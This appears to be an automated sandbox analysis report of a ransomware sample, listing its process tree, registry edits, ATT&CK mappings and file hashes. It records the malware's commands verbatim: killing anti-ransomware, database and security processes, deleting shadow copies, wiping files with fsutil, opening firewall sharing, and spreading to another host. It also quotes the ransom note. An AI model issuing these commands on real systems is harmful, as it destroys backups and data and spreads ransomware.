PID 1748 wrote to memory of 968	1748	sample.exe	schtasks.exe
PID 1748 wrote to memory of 968	1748	sample.exe	schtasks.exe
PID 1748 wrote to memory of 968	1748	sample.exe	schtasks.exe
PID 1748 wrote to memory of 1932	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1932	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1932	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1652	1748	sample.exe	netsh.exe
PID 1748 wrote to memory of 1652	1748	sample.exe	netsh.exe
PID 1748 wrote to memory of 1652	1748	sample.exe	netsh.exe
PID 1748 wrote to memory of 812	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 812	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 812	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 944	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 944	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 944	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1536	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1536	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1536	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1092	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1092	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1092	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1588	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1588	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1588	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1072	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1072	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1072	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1716	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1716	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1716	1748	sample.exe	sc.exe
PID 1748 wrote to memory of 1460	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1460	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1460	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 456	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 456	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 456	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 756	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 756	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 756	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 904	1748	sample.exe	netsh.exe
PID 1748 wrote to memory of 904	1748	sample.exe	netsh.exe
PID 1748 wrote to memory of 904	1748	sample.exe	netsh.exe
PID 1748 wrote to memory of 1596	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1596	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1596	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1392	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1392	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 1392	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 792	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 792	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 792	1748	sample.exe	taskkill.exe
PID 1748 wrote to memory of 788	1748	sample.exe	arp.exe
PID 1748 wrote to memory of 788	1748	sample.exe	arp.exe
PID 1748 wrote to memory of 788	1748	sample.exe	arp.exe
PID 1748 wrote to memory of 656	1748	sample.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	sample.exe

C:\Users\Admin\AppData\Local\Temp\sample.exe
"C:\Users\Admin\AppData\Local\Temp\sample.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1748

C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:464

C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:1112

C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:968

C:\Windows\system32\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:1932

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:1652

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:944

C:\Windows\system32\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:812

C:\Windows\system32\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:1536

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1092

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1588

C:\Windows\system32\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:1072

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1716

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1460

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:904

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:792

C:\Windows\system32\arp.exe
"arp" -a
2⤵
PID:788

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:656

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:332

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1148

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:616

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:2108

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2232

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:2448

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:2488

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:2548

C:\Windows\system32\arp.exe
"arp" -a
2⤵
PID:2676

C:\Users\Admin\AppData\Local\Temp\k3jnl3ar.exe
"C:\Users\Admin\AppData\Local\Temp\k3jnl3ar.exe" \\10.7.0.15 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\sample.exe"
2⤵
- Executes dropped EXE
PID:2748

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
PID:2828

C:\Windows\system32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:2844

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:2864

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:3036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe
2⤵
- Deletes itself
PID:3048

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:2060

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
1⤵
- Modifies registry class
- Opens file in notepad (likely ransom note)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:544

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta"
1⤵
- Modifies Internet Explorer settings
PID:2200

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

Modify Registry

4

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
MD5
8c94b1addaab3cabf76a4a479af2e307

SHA1
20d3f6f7c56569f5ff4dd7e055f72ab6435ed45d

SHA256
bc88058cb9d582c363995454b032ea0f4702e1406a4bcba024f091d48ac8e291

SHA512
3ce0bd82e597bd3c1392f00685e89143813cc00aea0f2624875d1f38253a2aeed07f75b7a036e6d378faf1426b86a033ef0dd5e6fa4542cfa1d4c04756aab8e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\k3jnl3ar.exe
MD5
6f47970bd915ab3d24f0cf5a24223718

SHA1
791ba6733e718d5289b5e7e13d13efb93ec5033f

SHA256
2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

SHA512
fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
MD5
405403ecb24b3cf908ca30890e361fd1

SHA1
e27e0bc862d1d3b4bddd8f76d781cc72810ce59c

SHA256
9ec087e4baa95c668fa381b9e36ca6018d1065653ea699c26038cff9abd6a593

SHA512
eb11ff9cdf7b6727af86ed63bd095b69397c4c68a8b12abf98556d8e7696cc19e5e8988b3e17e748c78e2cf6e8275ab52be761277350057e4751d01a56ef3c97

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
MD5
8c94b1addaab3cabf76a4a479af2e307

SHA1
20d3f6f7c56569f5ff4dd7e055f72ab6435ed45d

SHA256
bc88058cb9d582c363995454b032ea0f4702e1406a4bcba024f091d48ac8e291

SHA512
3ce0bd82e597bd3c1392f00685e89143813cc00aea0f2624875d1f38253a2aeed07f75b7a036e6d378faf1426b86a033ef0dd5e6fa4542cfa1d4c04756aab8e9

Download Submit
C:\Users\Admin\Documents\RESTORE_FILES_INFO.txt
MD5
8c94b1addaab3cabf76a4a479af2e307

SHA1
20d3f6f7c56569f5ff4dd7e055f72ab6435ed45d

SHA256
bc88058cb9d582c363995454b032ea0f4702e1406a4bcba024f091d48ac8e291

SHA512
3ce0bd82e597bd3c1392f00685e89143813cc00aea0f2624875d1f38253a2aeed07f75b7a036e6d378faf1426b86a033ef0dd5e6fa4542cfa1d4c04756aab8e9

Download Submit
\Users\Admin\AppData\Local\Temp\k3jnl3ar.exe
MD5
6f47970bd915ab3d24f0cf5a24223718

SHA1
791ba6733e718d5289b5e7e13d13efb93ec5033f

SHA256
2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

SHA512
fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

Download Submit
\Users\Admin\AppData\Local\Temp\k3jnl3ar.exe
MD5
6f47970bd915ab3d24f0cf5a24223718

SHA1
791ba6733e718d5289b5e7e13d13efb93ec5033f

SHA256
2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

SHA512
fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

Download Submit
memory/332-90-0x0000000000000000-mapping.dmp

Download
memory/432-111-0x0000000000000000-mapping.dmp

Download
memory/456-77-0x0000000000000000-mapping.dmp

Download
memory/464-63-0x0000000000000000-mapping.dmp

Download
memory/524-87-0x0000000000000000-mapping.dmp

Download
memory/544-145-0x0000000003610000-0x0000000003611000-memory.dmp

Filesize
4KB

Download
memory/564-97-0x0000000000000000-mapping.dmp

Download
memory/568-110-0x0000000000000000-mapping.dmp

Download
memory/616-115-0x0000000000000000-mapping.dmp

Download
memory/656-85-0x0000000000000000-mapping.dmp

Download
memory/756-78-0x0000000000000000-mapping.dmp

Download
memory/788-84-0x0000000000000000-mapping.dmp

Download
memory/792-83-0x0000000000000000-mapping.dmp

Download
memory/812-68-0x0000000000000000-mapping.dmp

Download
memory/836-109-0x0000000000000000-mapping.dmp

Download
memory/860-112-0x0000000000000000-mapping.dmp

Download
memory/904-79-0x0000000000000000-mapping.dmp

Download
memory/944-69-0x0000000000000000-mapping.dmp

Download
memory/968-65-0x0000000000000000-mapping.dmp

Download
memory/1072-74-0x0000000000000000-mapping.dmp

Download
memory/1092-72-0x0000000000000000-mapping.dmp

Download
memory/1112-64-0x0000000000000000-mapping.dmp

Download
memory/1148-92-0x0000000000000000-mapping.dmp

Download
memory/1152-91-0x0000000000000000-mapping.dmp

Download
memory/1160-94-0x0000000000000000-mapping.dmp

Download
memory/1276-62-0x0000000000000000-mapping.dmp

Download
memory/1304-101-0x0000000000000000-mapping.dmp

Download
memory/1348-117-0x0000000000000000-mapping.dmp

Download
memory/1352-118-0x0000000000000000-mapping.dmp

Download
memory/1392-82-0x0000000000000000-mapping.dmp

Download
memory/1456-107-0x0000000000000000-mapping.dmp

Download
memory/1460-76-0x0000000000000000-mapping.dmp

Download
memory/1500-114-0x0000000000000000-mapping.dmp

Download
memory/1504-99-0x0000000000000000-mapping.dmp

Download
memory/1512-104-0x0000000000000000-mapping.dmp

Download
memory/1520-113-0x0000000000000000-mapping.dmp

Download
memory/1524-86-0x0000000000000000-mapping.dmp

Download
memory/1536-71-0x0000000000000000-mapping.dmp

Download
memory/1552-89-0x0000000000000000-mapping.dmp

Download
memory/1568-116-0x0000000000000000-mapping.dmp

Download
memory/1572-103-0x0000000000000000-mapping.dmp

Download
memory/1576-100-0x0000000000000000-mapping.dmp

Download
memory/1588-73-0x0000000000000000-mapping.dmp

Download
memory/1596-81-0x0000000000000000-mapping.dmp

Download
memory/1636-119-0x0000000000000000-mapping.dmp

Download
memory/1640-93-0x0000000000000000-mapping.dmp

Download
memory/1648-105-0x0000000000000000-mapping.dmp

Download
memory/1652-67-0x0000000000000000-mapping.dmp

Download
memory/1652-70-0x000007FEFB8F1000-0x000007FEFB8F3000-memory.dmp

Filesize
8KB

Download
memory/1684-88-0x0000000000000000-mapping.dmp

Download
memory/1716-75-0x0000000000000000-mapping.dmp

Download
memory/1720-95-0x0000000000000000-mapping.dmp

Download
memory/1724-106-0x0000000000000000-mapping.dmp

Download
memory/1740-108-0x0000000000000000-mapping.dmp

Download
memory/1748-59-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/1748-61-0x000000001ADF0000-0x000000001ADF2000-memory.dmp

Filesize
8KB

Download
memory/1808-96-0x0000000000000000-mapping.dmp

Download
memory/1812-102-0x0000000000000000-mapping.dmp

Download
memory/1932-66-0x0000000000000000-mapping.dmp

Download
memory/2024-98-0x0000000000000000-mapping.dmp

Download
memory/2064-120-0x0000000000000000-mapping.dmp

Download
memory/2088-121-0x0000000000000000-mapping.dmp

Download
memory/2108-122-0x0000000000000000-mapping.dmp

Download
memory/2184-123-0x0000000000000000-mapping.dmp

Download
memory/2232-124-0x0000000000000000-mapping.dmp

Download
memory/2276-125-0x0000000000000000-mapping.dmp

Download
memory/2320-133-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/2320-131-0x000000001A850000-0x000000001A852000-memory.dmp

Filesize
8KB

Download
memory/2320-132-0x000000001A854000-0x000000001A856000-memory.dmp

Filesize
8KB

Download
memory/2320-130-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/2320-129-0x000000001AA50000-0x000000001AA51000-memory.dmp

Filesize
4KB

Download
memory/2320-128-0x00000000023E0000-0x00000000023E1000-memory.dmp

Filesize
4KB

Download
memory/2320-126-0x0000000000000000-mapping.dmp

Download
memory/2448-134-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads